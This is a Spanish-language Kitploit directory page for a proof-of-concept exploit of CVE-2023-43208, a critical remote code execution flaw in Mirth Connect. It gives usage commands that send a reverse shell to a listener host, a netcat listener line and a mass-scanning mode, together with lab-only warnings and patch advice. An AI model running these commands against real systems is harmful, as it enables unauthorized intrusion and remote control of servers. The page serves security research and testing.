Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-2023-43208 — Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1. | Kitploit
Herramientas/GitHubGitHub/mkirahmet/poc-2023-43208
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1.

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208-EXPLOIT

Exploit de Ejecución Remota de Código (RCE) en Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ SOLO PARA USO EDUCATIVO Y EN LABORATORIO ⚠️

Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1.

🚨 AVISO LEGAL IMPORTANTE

Esta herramienta es estrictamente para:

  • 🧪 Fines educativos
  • 🔬 Pruebas de seguridad autorizadas en entornos de laboratorio
  • 📚 Investigación y aprendizaje en ciberseguridad

NO LA USE:

  • ❌ Contra sistemas que no le pertenecen
  • ❌ Sin permiso explícito por escrito
  • ❌ En entornos de producción
  • ❌ Para fines ilegales o maliciosos

Usted es responsable de cumplir con todas las leyes y regulaciones aplicables. El mal uso de esta herramienta puede dar lugar a cargos penales.

📋 Descripción

Este exploit ataca la vulnerabilidad de deserialización XML en el endpoint /api/users de Mirth Connect, permitiendo la ejecución remota de código no autenticada en versiones afectadas (< 4.4.1).

Esta es una vulnerabilidad CRÍTICA y solo debe probarse en entornos de laboratorio aislados con sus propios sistemas.

🔧 Requisitos

  • Python 3.7 o superior
  • Paquetes requeridos listados en requirements.txt
  • UN ENTORNO DE LABORATORIO con una instancia vulnerable de Mirth Connect

🚀 Instalación

Clonar el repositorio

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Instalar requisitos

pip install -r requirements.txt

💻 Uso (SOLO EN LABORATORIO)

Modo interactivo (Recomendado para laboratorio)

root@kitploit:~
python exploit.py

Modo línea de comandos

root@kitploit:~
# Explotación de un solo objetivo (SOLO EN LABORATORIO)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

# Escanear múltiples objetivos desde un archivo (SOLO EN LABORATORIO)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt

# Modo no interactivo (SOLO EN LABORATORIO)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive

Opciones

root@kitploit:~
-u, --url       URL del objetivo a explotar (SOLO EN LABORATORIO)
-lh, --lhost    Host de escucha (su IP)
-lp, --lport    Puerto de escucha
-f, --file      Archivo que contiene las URL de los objetivos a escanear
-o, --output    Archivo de salida para guardar los resultados del escaneo
-t, --threads   Número de hilos para el escaneo (por defecto: 50)
--no-interactive Ejecutar en modo no interactivo

🎯 Ejemplo de Entorno de Laboratorio

Configure su laboratorio:

  1. Instale la versión vulnerable de Mirth Connect (< 4.4.1) en una máquina virtual aislada
  2. Use una red controlada (por ejemplo, NAT/Solo-anfitrión en VirtualBox/VMware)
  3. Nunca la exponga a internet

Inicie su listener:

root@kitploit:~
ncat -lnvp 4444
# o
nc -lnvp 4444

Ejecute el exploit en su laboratorio:

root@kitploit:~
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444

🧪 Requisitos del Entorno de Prueba

  • Red/VLAN aislada
  • Solo máquinas virtuales
  • Sin datos de producción
  • Reglas de cortafuegos que bloqueen el acceso externo
  • Autorización adecuada documentada

📝 Detalles Técnicos

  • Tipo de vulnerabilidad: Deserialización XML RCE
  • Versiones afectadas: Mirth Connect < 4.4.1
  • Versión corregida: 4.4.1 y posteriores
  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Red
  • Autenticación requerida: Ninguna

El exploit utiliza gadgets de Commons Collections para lograr RCE a través del endpoint /api/users.

🛡️ Medidas de Protección

Si está ejecutando Mirth Connect:

✅ Actualice a la versión 4.4.1 o posterior

✅ Restrinja el acceso de red a las interfaces de administración

✅ Implemente autenticación adecuada

✅ Monitoree la presencia de payloads XML sospechosos

👥 Créditos

  • Autores originales: K3ysTr0K3R & Chocapikk
  • Modificado por: M0h4
  • CVE: CVE-2023-43208

⚠️ ADVERTENCIA FINAL

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  ESTA HERRAMIENTA ES SOLO PARA USO EN LABORATORIO            ║
║  El uso no autorizado es ILEGAL y NO ÉTICO                   ║
║  Usted asume TODO el riesgo y la responsabilidad             ║
║  El autor NO acepta responsabilidad por el mal uso           ║
╚══════════════════════════════════════════════════════════════╝
Descargar herramienta